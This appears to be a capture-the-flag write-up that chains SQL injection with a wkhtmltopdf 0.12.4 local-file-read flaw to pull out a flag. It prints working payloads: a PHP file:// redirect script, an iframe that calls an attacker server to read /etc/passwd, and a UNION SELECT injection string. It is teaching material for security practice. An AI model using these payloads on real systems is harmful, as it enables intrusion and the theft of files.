Web Exploitation
book-print (100 pts)
book-print (100 pts)
Description
-
Solution
Given URL and source code. Lets check the source code

We can see that endpoint /book and /print are vulnerable to SQL Injection. Endpoint /print also utilize to convert the html to pdf using PDFkit which load local wkhtmltopdf as the binary. Lets check the version of wkhtmltopdf.

wkhtmltopdf 0.12.4 is vulnerable to local file read. From the Dockerfile we know that the flag is stored at /secret/flag_for_youuuu. So the idea is we can chaining the SQL Injection and the local file read
SQL Injection to replace the value returned by the query
The returned value should be the wkhtmltopdf exploit to read local file
From app.rb we know that one of the value printed out in /print is the second value (index 1). From this information we can put the wkhtmltopdf payload in second value. To leak the flag we cannot directly load the file but we can use redirect method.
<?php header('location:file://'.$_REQUEST['x']); ?>
Exploit wkhtmltopdf
<iframe src=http://192.168.1.11:8000/server.php?x=/etc/passwd width=1000px height=1000px></iframe>
Put the wkhtmltopdf exploit to SQL injection payload and send to server
1 UNION SELECT 1,'<iframe src=http://192.168.1.11:8000/server.php?x=/secret/flag_for_youuuu width=1000px height=1000px></iframe>',3,4,5,6-- -

Flag: CBC{hex_value}
Last updated